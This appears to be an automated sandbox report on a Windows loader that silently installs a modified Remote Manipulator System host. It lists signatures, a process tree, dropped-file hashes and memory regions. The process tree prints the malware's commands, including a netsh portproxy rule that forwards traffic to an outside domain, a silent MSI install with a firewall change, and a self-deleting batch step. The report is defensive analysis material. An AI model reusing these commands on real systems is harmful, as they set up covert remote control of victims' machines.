Resubmissions

29-12-2021 11:50

211229-nz3vsaddbl 8

29-12-2021 11:29

211229-nlssnaddak 10

28-12-2021 17:00

211228-vh1sescfan 10

Analysis

  • max time kernel
    143s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-12-2021 17:00

General

  • Target

    tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe

  • Size

    397KB

  • MD5

    aff57ee1a4f3731c2036046910f78fb4

  • SHA1

    ef9627c0cadff85a3dfaab6aef0b7c885f03b186

  • SHA256

    3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

  • SHA512

    5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • Modifies powershell logging option 1 TTPs
  • Drops file in Program Files directory 53 IoCs
  • Drops file in Windows directory 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 6 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
    1⤵
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ywmv_yex.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES530.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC510.tmp"
        3⤵
          PID:576
      • C:\Windows\system32\chcp.com
        "C:\Windows\system32\chcp.com" 437
        2⤵
          PID:1456
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy show all
          2⤵
            PID:648
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:756
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1636
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:912
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" interface portproxy reset
            2⤵
              PID:2024
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" interface portproxy show all
              2⤵
                PID:1364
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
                2⤵
                  PID:924
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                  2⤵
                    PID:1932
                  • C:\Windows\system32\netsh.exe
                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                    2⤵
                      PID:1740
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1520
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1608
                    • C:\Windows\system32\NETSTAT.EXE
                      "C:\Windows\system32\NETSTAT.EXE" -na
                      2⤵
                      • Gathers network information
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1616
                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
                      "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1556
                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
                        3⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1692
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
                          4⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1504
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
                          4⤵
                            PID:1068
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1444
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Blocklisted process makes network request
                      • Enumerates connected drives
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2044
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding F8B60EFCC21853C0C6C4D7B689851286
                        2⤵
                        • Loads dropped DLL
                        PID:1188
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:884
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1448
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1748
                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
                      "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:1892
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                        2⤵
                        • Executes dropped EXE
                        PID:460
                      • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                        "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1608
                        • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
                          "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: SetClipboardViewer
                          PID:1756

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\Remote Manipulator System - Host\English.lg

                      MD5

                      bc25377ade68750b834c81fa71c233b8

                      SHA1

                      84dbb465dd2125f47668e2508e18af9bd6db2fd8

                      SHA256

                      9a48a7ea7ba2c2f33280d1e1722ebbc59bf81bc6c5a1f97edca53ea641ffd8e3

                      SHA512

                      205ab195339d7108adbe6dfabd48e4e21c5956ded587d7213a44618f0d34a43f7b8abaa7765b9d31695efacfc44beeb69fbaa3cb27c141b6a653713fdf5ebce5

                    • C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll

                      MD5

                      2ddfa39f5c2fd3f00681ef2970617e4b

                      SHA1

                      8152aa18afbacf398b92168995ec8696d3fe3659

                      SHA256

                      f938bdc741ef1d2738b532aef001a160e3a3627ed8a27158b7017ee49fc65791

                      SHA512

                      f89f0f02cda650c138e4ebaef198f0762dfd571ef7d46a6b3710cd93d76bc52a79055c55afca46128a9a84a795a5cb946ca93c492e07cfb503c9b27d96211e20

                    • C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll

                      MD5

                      3d0b27b3f8aa22575aa0faf0b2d67216

                      SHA1

                      39fc787538849692ed7352418616f467b7a86a1d

                      SHA256

                      d7782488ef29bf0fd7e8faf0bd24414a6540bf7366434692a5a485d5ae2d7d44

                      SHA512

                      19f0785d3cecce0dbbb7da1be640bffebe4daedc65a513d1db0b5e533eb96aaa0588831de74c88e5013c00405e03ca4188c4b633e39e6c49ab5c1d1b42191ca8

                    • C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg

                      MD5

                      e44e34bc285b709f08f967325d9c8be1

                      SHA1

                      e73f05c6a980ec9d006930c5343955f89579b409

                      SHA256

                      1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

                      SHA512

                      576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll

                      MD5

                      292a1748850d1fdc91d4ec23b02d6902

                      SHA1

                      8f15f1c24e11c0b45b19c82a78f7b79b1e7f932d

                      SHA256

                      acf354ad6ed94e876b29a60c5870dd91e7b3f76cc82c1a862c92024a12404a9f

                      SHA512

                      cf7579f1169ec21d9bf3c666d416d3fe2a4f9953d4d328b182452e40043f91055d301fd4b4a21454b847dbdb0af6a61c52657caded7d6fd7e88812aceeacf704

                    • C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll

                      MD5

                      4570f7a40357016c97afe0dd4faf749b

                      SHA1

                      ebc8a1660f1103c655559caab3a70ec23ca187f1

                      SHA256

                      a5f008bf852d4c73e001f840d6f8b233c7d9bc9570cee639d40c1c8723bf99f8

                      SHA512

                      6b16979d004adc04259f2ce043cde6f7b57f2ddf5f4cea7bb390fd6b9fb273d22355b837f1b5c2eae77ea7df792de8e6db43e31d7246f044935a8187dace493b

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll

                      MD5

                      038bf9f3a58560ad1130eeb85cdc1a87

                      SHA1

                      3571eb7293a2a3a5bf6eb21e1569cd151d995d1a

                      SHA256

                      d247afa3bd1ccc18e11eb099280802a61d3792a2018c476d95debf2091e9707d

                      SHA512

                      8ffa52b358841600b9122974079d22d4e11bc4214316cd85ac4d4af0e369112b6827029f74a9a9d3918db00c7fed3a9a1985e0b43da39783a748d78752ae2385

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll

                      MD5

                      eeb2c52abbc7eb1c029b7fec45a7f22e

                      SHA1

                      8bfeb412614e3db0a2bf0122f4d68cc27b8c3a61

                      SHA256

                      c0f0b84d587066af8f80f41a7be63b4c01547af3f1e011602ac1b6ee0ac54a2c

                      SHA512

                      0b5b83335c6f602b8397a3c2ae6d1e661d744eb27114463d53e344bf18774ccb38853d314ebe05536d4c28c29fe3fdaba041a6a46983789f064ca70881cfcb85

                    • C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll

                      MD5

                      e38372f576d927f525ef8e1a34b54664

                      SHA1

                      26af9d1db0a3f91d7fe13147e55f06c302d59389

                      SHA256

                      4046bd0b93909a41d0fd96f0405a864c79a47f493165546569251c1f73db6b0b

                      SHA512

                      78b7477b000407990304ec37624b873514d4ed9daa1b42fd988707b7374ffab442ba28fe19884724867f3f0f7a5f12f7fc8c228c050115c902d1569e4a3b13c7

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      MD5

                      1e91f39181acab3d76d4263180872ded

                      SHA1

                      f40ad03c27e686ba13a4894009dd1fed46256fd0

                      SHA256

                      215ac6443b23506515d4e92e3046a9ca16b1deb270b691c59ad5ce437688c687

                      SHA512

                      b6953f4221158f6280a791e683d04e70c77d59f5cc941636fb5924f6ade7ed7afacb66e785e80fe11e762743ae6889e75c165d91bc49b00b65430f9063a6c56e

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi

                      MD5

                      73e578a44265558d3ace212869d43cbb

                      SHA1

                      d2c15578def8996ed0ae4a44754055b774b095a7

                      SHA256

                      8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

                      SHA512

                      fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

                    • C:\Users\Admin\AppData\Local\Temp\RES530.tmp

                      MD5

                      7ed52c78db24b22d54634fca7048ddd2

                      SHA1

                      33cf078827b37ea77119869455b6b44110e59faf

                      SHA256

                      a21cbe5eadd992c386853cd688cb734204c1a26784cde81dff2be010f25d4057

                      SHA512

                      2da2e58cfe083162ab139737f89704624f76bf6d5f8a5f6cd907a17b74a37712896b141ac3aa7849de2cb92be13a96eca698eed2d850b01368003d04b5a5c2a4

                    • C:\Users\Admin\AppData\Local\Temp\killself.bat

                      MD5

                      c2ac85b000427a4a00f19da237aaaf86

                      SHA1

                      459ecb5e64576348e6c654724e87825772c06ea8

                      SHA256

                      b5157eceaf9b5f6448d15dcfe7011af0b44a4288f7667c5d717f042c2fba1352

                      SHA512

                      e62f711445398b0654e698c4f7d4c75bb8693e901ae99f1cf543f45ccd9532daf27bba1ceb9d180d0379a41c9a62d6ee2df30cd25b9abb05532c551a0fad814b

                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                      MD5

                      73f351beae5c881fafe36f42cde9a47c

                      SHA1

                      dc1425cfd5569bd59f5d56432df875b59da9300b

                      SHA256

                      a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                      SHA512

                      f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                    • C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe

                      MD5

                      73f351beae5c881fafe36f42cde9a47c

                      SHA1

                      dc1425cfd5569bd59f5d56432df875b59da9300b

                      SHA256

                      a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                      SHA512

                      f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                    • C:\Users\Admin\AppData\Local\Temp\ywmv_yex.dll

                      MD5

                      3b65fe8518ee80a217b6a97971c38073

                      SHA1

                      1c1e9ed201699c827d7db91b8444b8229ffc6c77

                      SHA256

                      828eb265e25499403e8c38bff1bb62b5f8ca4d84ebf53a88dbd14459b6ec97e1

                      SHA512

                      9a58941714093c350c3eb72738dfe83711a3838cab9cb3002d990ad73f43539606ee3ec298e45f09b7e0e1d67ce7e08314b84fa172a8e12d6e30ea194fe9b86a

                    • C:\Users\Admin\AppData\Local\Temp\ywmv_yex.pdb

                      MD5

                      06c78f76197d29b14c0ba54ac7fd7cd4

                      SHA1

                      bbd48be919f7da7035567e5fa16aed78de63aaac

                      SHA256

                      9c183bd8e5beff5f148c81e735d0e859205dc54a65428ee3c74af143c391505f

                      SHA512

                      98933003e9ae03f94e535d418a4b7d1f835fb8629f1f8a9b5697a44a16e7394c1ca556e00a0b49162f84fa3e1601170c09949785af0d01ac5ff0fa189a45fba8

                    • \??\c:\Users\Admin\AppData\Local\Temp\CSC510.tmp

                      MD5

                      b624b41c38aa93de574d413b6f652efc

                      SHA1

                      007a0c0df6183909fbe02ad63291d4ee171d9b1d

                      SHA256

                      8ed3350ffa75c060005da129574e600dfab9a55dcca5ddb36f622a32817e811c

                      SHA512

                      1abe4d804ede9fecada3971bc01bd977c3b4b3bfa3a1b45ecd13e7318942aa8c5bdbce738980fe9d2882d6852cc2260c77bd5c6de317b5c8b3071b5285dce399

                    • \??\c:\Users\Admin\AppData\Local\Temp\ywmv_yex.0.cs

                      MD5

                      1640a04633fee0dfdc7e22c4f4063bf6

                      SHA1

                      3cb525c47b5dd37f8ee45b034c9452265fba5476

                      SHA256

                      55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

                      SHA512

                      85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

                    • \??\c:\Users\Admin\AppData\Local\Temp\ywmv_yex.cmdline

                      MD5

                      b3c2b8f2b705a708aa5d72ad3284eb7b

                      SHA1

                      358c8e4a38901bd9e6d42f748b667957766b7c99

                      SHA256

                      7548821ba5c9c7004fb8a8c700667a09804957630e00d3af1eb802357fc6e83f

                      SHA512

                      ce4343beb92a1d3413a671903c159f49354b3e2aca12835fcbc7c68ac7eadd1a678a69d9894e4e563ae51d10b4ac2be1d932971c4b761d7df96d6082b12a69ec

                    • \Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • \Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe

                      MD5

                      76ebe5fd077a62161d0ab560208b9f94

                      SHA1

                      614c218d35ba531f0bad791d52e5dcf57df5c742

                      SHA256

                      f0a653463850ce111457513e9ad3ec4443ed88c69fdf33d76e05c33ce8e1722b

                      SHA512

                      baba7b03042c4bfbf6efa9c2219ed72e393e193ee743a32501e1a5df56293b3bdf2270b92843c9333049dcfcfe52007d6e9a7bfaa0548ef268d2511cf590efde

                    • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

                      MD5

                      c9704931d887685d96ce92d637d84045

                      SHA1

                      0875a71e9118ded121d92f3f46a3af1ec8380f8b

                      SHA256

                      0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

                      SHA512

                      3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

                    • \Windows\Installer\MSIFA8F.tmp

                      MD5

                      b0bcc622f1fff0eec99e487fa1a4ddd9

                      SHA1

                      49aa392454bd5869fa23794196aedc38e8eea6f5

                      SHA256

                      b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

                      SHA512

                      1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

                    • memory/460-142-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/460-137-0x0000000000000000-mapping.dmp

                    • memory/576-62-0x0000000000000000-mapping.dmp

                    • memory/648-69-0x0000000000000000-mapping.dmp

                    • memory/756-71-0x0000000000000000-mapping.dmp

                    • memory/884-113-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/884-106-0x0000000000000000-mapping.dmp

                    • memory/912-73-0x0000000000000000-mapping.dmp

                    • memory/924-78-0x0000000000000000-mapping.dmp

                    • memory/1068-120-0x0000000000000000-mapping.dmp

                    • memory/1188-104-0x0000000000000000-mapping.dmp

                    • memory/1364-76-0x0000000000000000-mapping.dmp

                    • memory/1372-58-0x0000000000000000-mapping.dmp

                    • memory/1372-61-0x00000000020A0000-0x00000000020A2000-memory.dmp

                      Filesize

                      8KB

                    • memory/1444-68-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

                      Filesize

                      8KB

                    • memory/1448-114-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1448-110-0x0000000000000000-mapping.dmp

                    • memory/1456-67-0x0000000000000000-mapping.dmp

                    • memory/1504-100-0x0000000000000000-mapping.dmp

                    • memory/1520-84-0x0000000000000000-mapping.dmp

                    • memory/1556-91-0x0000000075B11000-0x0000000075B13000-memory.dmp

                      Filesize

                      8KB

                    • memory/1556-89-0x0000000000000000-mapping.dmp

                    • memory/1608-143-0x00000000001C0000-0x00000000001C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1608-85-0x0000000000000000-mapping.dmp

                    • memory/1608-136-0x0000000000000000-mapping.dmp

                    • memory/1616-86-0x0000000000000000-mapping.dmp

                    • memory/1636-72-0x0000000000000000-mapping.dmp

                    • memory/1692-94-0x0000000000000000-mapping.dmp

                    • memory/1692-98-0x0000000000240000-0x0000000000241000-memory.dmp

                      Filesize

                      4KB

                    • memory/1724-57-0x000007FEF23B0000-0x000007FEF2F0D000-memory.dmp

                      Filesize

                      11.4MB

                    • memory/1724-55-0x000007FEF2F10000-0x000007FEF3FA6000-memory.dmp

                      Filesize

                      16.6MB

                    • memory/1724-56-0x00000000021B0000-0x00000000021B2000-memory.dmp

                      Filesize

                      8KB

                    • memory/1724-88-0x000000001B220000-0x000000001B239000-memory.dmp

                      Filesize

                      100KB

                    • memory/1724-87-0x00000000021DD000-0x00000000021DF000-memory.dmp

                      Filesize

                      8KB

                    • memory/1740-82-0x0000000000000000-mapping.dmp

                    • memory/1748-115-0x0000000000000000-mapping.dmp

                    • memory/1748-122-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/1756-144-0x0000000000000000-mapping.dmp

                    • memory/1756-147-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-123-0x00000000002F0000-0x00000000002F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1932-80-0x0000000000000000-mapping.dmp

                    • memory/2024-74-0x0000000000000000-mapping.dmp